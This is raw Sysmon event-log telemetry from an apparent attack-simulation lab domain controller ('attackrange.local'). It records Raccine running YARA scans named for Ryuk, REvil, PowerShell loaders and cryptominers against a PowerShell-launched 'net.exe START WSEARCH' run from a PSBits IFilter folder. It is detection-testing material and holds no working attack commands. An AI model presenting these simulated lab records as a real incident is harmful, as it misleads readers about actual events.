19:25:24.496{9DBE88B5-C32E-61A8-0D00-000000000E02}9086108C:\Windows\system32\svchost.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002254593Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:23:22.998{9DBE88B5-2F14-61B2-9603-010000000E02}80647832C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62a85|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002254592Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:23:22.997{9DBE88B5-2F14-61B2-9603-010000000E02}80647832C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6299e|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002254591Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:23:22.997{9DBE88B5-2F14-61B2-9603-010000000E02}80647832C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62967|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002254590Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:23:22.996{9DBE88B5-2F14-61B2-9603-010000000E02}80646016C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62400|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002254589Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:23:22.996{9DBE88B5-2F14-61B2-9603-010000000E02}80646016C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c00|C:\Windows\System32\SHELL32.dll+623bc|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002254588Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:23:22.996{9DBE88B5-2F14-61B2-9603-010000000E02}80646016C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62390|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002254587Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:23:22.996{9DBE88B5-2F14-61B2-9603-010000000E02}80646016C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002251555Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:19:23.485{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000002247703Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:14.681{9DBE88B5-5584-61B2-0909-010000000E02}7336ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBCFD.tmpMD5=779F5AB5327FC99736B1988354F6553D,SHA256=829218A94D9D3DCC375F7D9CC3C37D5A17F8DB233048893BBB47F03C17D85240,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002247698Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.342{9DBE88B5-5585-61B2-2109-010000000E02}80364144C:\Program Files\Raccine\yara64.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\yara64.exe+8503f|C:\Program Files\Raccine\yara64.exe+7ce90|C:\Program Files\Raccine\yara64.exe+73b07|C:\Program Files\Raccine\yara64.exe+7303c|C:\Program Files\Raccine\yara64.exe+17c129|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247695Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.329{9DBE88B5-5585-61B2-2209-010000000E02}74285600C:\Windows\system32\conhost.exe{9DBE88B5-5585-61B2-2109-010000000E02}8036C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247690Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.317{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5585-61B2-2109-010000000E02}8036C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002247688Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.317{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5585-61B2-2109-010000000E02}8036C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+116f5|C:\Program Files\Raccine\Raccine.exe+6156|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002247687Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.317{9DBE88B5-5585-61B2-2109-010000000E02}8036C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\in-memory\gen_loaders.yar" 6776 -d MemoryScan=1 -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002247684Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.300{9DBE88B5-5585-61B2-2009-010000000E02}81808104C:\Windows\system32\conhost.exe{9DBE88B5-5585-61B2-1F09-010000000E02}4748C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247678Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.288{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5585-61B2-1F09-010000000E02}4748C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002247677Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.288{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5585-61B2-1F09-010000000E02}4748C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002247676Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.288{9DBE88B5-5585-61B2-1F09-010000000E02}4748C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ryuk-commandlines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBCFD.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002247672Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.271{9DBE88B5-5585-61B2-1E09-010000000E02}73845488C:\Windows\system32\conhost.exe{9DBE88B5-5585-61B2-1D09-010000000E02}6456C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247666Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.260{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5585-61B2-1D09-010000000E02}6456C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002247665Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.260{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5585-61B2-1D09-010000000E02}6456C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002247664Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.260{9DBE88B5-5585-61B2-1D09-010000000E02}6456C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\powershell_loaders.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBCFD.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002247661Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.244{9DBE88B5-5585-61B2-1C09-010000000E02}78805648C:\Windows\system32\conhost.exe{9DBE88B5-5585-61B2-1B09-010000000E02}5152C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247655Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.232{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5585-61B2-1B09-010000000E02}5152C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002247654Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.232{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5585-61B2-1B09-010000000E02}5152C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002247653Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.231{9DBE88B5-5585-61B2-1B09-010000000E02}5152C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\other_0xa9five_poc.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBCFD.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002247650Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.216{9DBE88B5-5585-61B2-1A09-010000000E02}65805476C:\Windows\system32\conhost.exe{9DBE88B5-5585-61B2-1909-010000000E02}3172C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247645Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.204{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5585-61B2-1909-010000000E02}3172C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002247643Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.203{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5585-61B2-1909-010000000E02}3172C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002247642Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.204{9DBE88B5-5585-61B2-1909-010000000E02}3172C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_revil.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBCFD.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002247639Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.188{9DBE88B5-5585-61B2-1809-010000000E02}13644692C:\Windows\system32\conhost.exe{9DBE88B5-5585-61B2-1709-010000000E02}6364C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247633Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.176{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5585-61B2-1709-010000000E02}6364C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002247632Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.176{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5585-61B2-1709-010000000E02}6364C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002247631Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.176{9DBE88B5-5585-61B2-1709-010000000E02}6364C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_exchange_cryptominer.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBCFD.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d 